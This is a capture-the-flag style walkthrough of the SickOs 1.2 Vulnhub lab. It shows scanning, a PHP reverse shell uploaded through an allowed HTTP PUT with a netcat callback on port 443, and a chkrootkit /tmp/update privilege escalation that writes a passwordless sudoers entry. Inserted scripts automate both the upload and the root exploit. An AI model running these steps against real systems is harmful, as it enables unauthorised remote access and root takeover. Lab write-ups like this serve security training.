SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

First, find the target's IP with a ping sweep of the lab subnet (-sP is the old spelling of -sn, host discovery only):

nmap -sP

The IP address is

Now a detailed scan: all TCP ports, version and OS detection, and the vuln script category (-T5 is fine against a local VM, but it is noisy and drops results on a real network):

root@kali:~# nmap -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   Slowloris DOS attack
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|     Disclosure date: 2009-09-17
|     References:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6
|       CVE-2014-2323   7.5
|       CVE-2013-4508   5.8
|       CVE-2018-19052  5.0
|       CVE-2014-2324   5.0
|       CVE-2011-4362   5.0
|_      CVE-2013-4560   2.6
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   1.04 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

There is nothing interesting in index.php, but http-enum found a /test/ directory.

Let's use curl to check which HTTP methods the server allows on it:

curl -v -X OPTIONS

PUT is allowed here, so we can write files into /test/. Let's try uploading a PHP reverse shell.

Download pentestmonkey's php-reverse-shell, unpack it, and PUT it on the server.

tar -xzf php-reverse-shell-1.0.tar.gz

Edit the $ip and $port variables in the script so they point at our machine.

Start a netcat listener on our machine on that port:

nc -nlvp 5555

and upload the script to the server. lighttpd only accepted the PUT over HTTP/1.0 (-0 and --http1.0 are the same switch, so one is enough):

curl -v --http1.0 --upload-file shell.php --url

Now request the uploaded file on the server. The script runs, but no shell comes back; the page shows:

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

The callback to port 5555 timed out, so outbound connections from the target are being filtered. Port 443 is the usual bet, since HTTPS egress is rarely blocked. Edit the port in the script, restart the listener on 443, and re-upload the file.

We got a connection back from the server. Great.
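The upload steps above collected into one script, added here as an example; it is not code from the original post. It parses the Allow header out of an OPTIONS response, refuses to go on unless PUT is listed, uploads the file with the same HTTP/1.0 switch the post needed, and then confirms the uploaded file is being served with a HEAD request. The sample OPTIONS response is constructed (not captured from the machine) so the parsing can be exercised offline, and TARGET in the usage comment is a placeholder for the elided IP.

```shell
#!/bin/sh
# Added example: check for PUT, upload a file, confirm it is reachable.
# The sample response below and the TARGET host are assumptions, not captures.

# Constructed sample of what "curl -i -X OPTIONS http://TARGET/test/" might return.
SAMPLE_OPTIONS='HTTP/1.1 200 OK
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Content-Length: 0
'

# allowed_methods RESPONSE: print each method from the Allow header on its own line.
allowed_methods() {
  printf '%s\n' "$1" | tr -d '\r' |
    awk -F': *' 'tolower($1) == "allow" { gsub(/[, ]+/, "\n", $2); print $2 }'
}

# method_allowed RESPONSE METHOD: succeed if METHOD appears in the Allow header.
method_allowed() {
  allowed_methods "$1" | grep -qx "$2"
}

# fetch_options URL: live OPTIONS probe against the target (needs network).
fetch_options() {
  curl -s -i -X OPTIONS "$1"
}

# upload_file DIR_URL LOCAL_FILE REMOTE_NAME: PUT the file only if the server
# advertises PUT. -0 forces HTTP/1.0, the switch the post needed for lighttpd.
# Prints the status code of a follow-up HEAD request so the caller can see the
# file is now served (200 expected).
upload_file() {
  dir_url=$1; local_file=$2; remote_name=$3
  resp=$(fetch_options "$dir_url/")
  if ! method_allowed "$resp" PUT; then
    echo "PUT not allowed on $dir_url/ (Allow: $(allowed_methods "$resp" | tr '\n' ' '))" >&2
    return 1
  fi
  put_code=$(curl -s -0 -o /dev/null -w '%{http_code}' \
                  --upload-file "$local_file" "$dir_url/$remote_name")
  case $put_code in
    200|201|204) ;;
    *) echo "PUT returned HTTP $put_code" >&2; return 1 ;;
  esac
  curl -s -I -o /dev/null -w '%{http_code}\n' "$dir_url/$remote_name"
}

# Usage against a lab target (TARGET is a placeholder):
#   nc -nlvp 443 &                                  # listener first, on a port egress filtering lets through
#   upload_file http://TARGET/test shell.php shell.php
#   curl -s http://TARGET/test/shell.php            # requesting the file triggers the callback
```

The HEAD check matters because lighttpd will happily answer 201 to a PUT and then serve the file from a directory where PHP is not executed; a 200 on the HEAD at least tells you the path is right before you start chasing firewall problems.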

Let's now try to escalate privileges.

First, upgrade to a proper TTY shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Let's have a look at the cron jobs:

ls -l /etc/cron.daily

There is a daily cron job that runs chkrootkit. Old chkrootkit releases (0.49 and earlier, CVE-2014-0476; fixed in 0.50) have a local privilege escalation: the slapper() check executes a file named /tmp/update as root if that file exists and is executable. It is worth confirming the installed version before relying on it.

So chkrootkit will run any executable placed at /tmp/update with root privileges.

Let's create the file:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

This cron job runs daily, so we have to wait until the next time it fires. Use this command to check whether the file has been updated (watch the size and modification time):

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.
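The privilege escalation above as one script, added here as an example and not code from the original post. It checks the version string printed by chkrootkit -V (0.49 and earlier carry the bug), writes a /tmp/update payload with a proper shebang that appends the sudoers entry and restores the 0440 mode, and polls the sudoers file until the entry shows up instead of re-running ls by hand. The payload and sudoers paths are parameters so each step can be tried against temporary files first; running it for real as www-data, and chkrootkit being on the PATH, are assumptions.

```shell
#!/bin/sh
# Added example: chkrootkit /tmp/update privilege escalation (CVE-2014-0476),
# parameterised so each step can be checked against temporary files first.

# chkrootkit_vulnerable VERSION_OUTPUT: succeed if the "chkrootkit -V" output
# names a version <= 0.49 (the /tmp/update bug was fixed in 0.50).
chkrootkit_vulnerable() {
  v=$(printf '%s\n' "$1" | sed -n 's/.*version \([0-9][0-9.]*\).*/\1/p')
  [ -n "$v" ] || return 2            # no version string at all (not installed?)
  major=${v%%.*}
  minor=${v#*.}; minor=${minor%%.*}
  [ "$major" -eq 0 ] && [ "$minor" -le 49 ]
}

# write_payload PATH USER [SUDOERS]: create the script that chkrootkit's
# slapper() check executes as root. It grants USER passwordless sudo and
# puts the sudoers mode back to 0440 so sudo does not refuse the file.
write_payload() {
  path=$1; user=$2; sudoers=${3:-/etc/sudoers}
  cat > "$path" <<EOF
#!/bin/sh
# Runs as root when chkrootkit executes $path (CVE-2014-0476).
chmod u+w "$sudoers"
echo "$user ALL=NOPASSWD: ALL" >> "$sudoers"
chmod 440 "$sudoers"
EOF
  chmod +x "$path"
}

# wait_for_line FILE PATTERN TIMEOUT_S [INTERVAL_S]: poll FILE until PATTERN
# appears or TIMEOUT_S elapses. Returns 0 when found, 1 on timeout.
wait_for_line() {
  file=$1; pattern=$2; timeout=$3; interval=${4:-30}
  while [ "$timeout" -gt 0 ]; do
    grep -q "$pattern" "$file" 2>/dev/null && return 0
    sleep "$interval"
    timeout=$((timeout - interval))
  done
  return 1
}

# Live use on the target, from the www-data reverse shell: sh thisfile.sh exploit
if [ "${1:-}" = "exploit" ]; then
  chkrootkit_vulnerable "$(chkrootkit -V 2>&1)" ||
    { echo "chkrootkit missing or not a vulnerable version" >&2; exit 1; }
  write_payload /tmp/update www-data
  wait_for_line /etc/sudoers 'www-data ALL=NOPASSWD' 86400 30 &&
    echo "sudoers updated: run sudo -l, then sudo su"
fi
```

Polling with grep rather than eyeballing ls -la also catches the failure mode where the job ran but the payload did not (a typo in the script, /tmp mounted noexec): the mtime never changes and the loop simply times out.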

Now check our privileges: sudo -l should list the new NOPASSWD entry, and sudo su drops us into a root shell.

We are root now. Let's find the flag.

SickOs 1.2 conquered! Next day, next machine!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-]
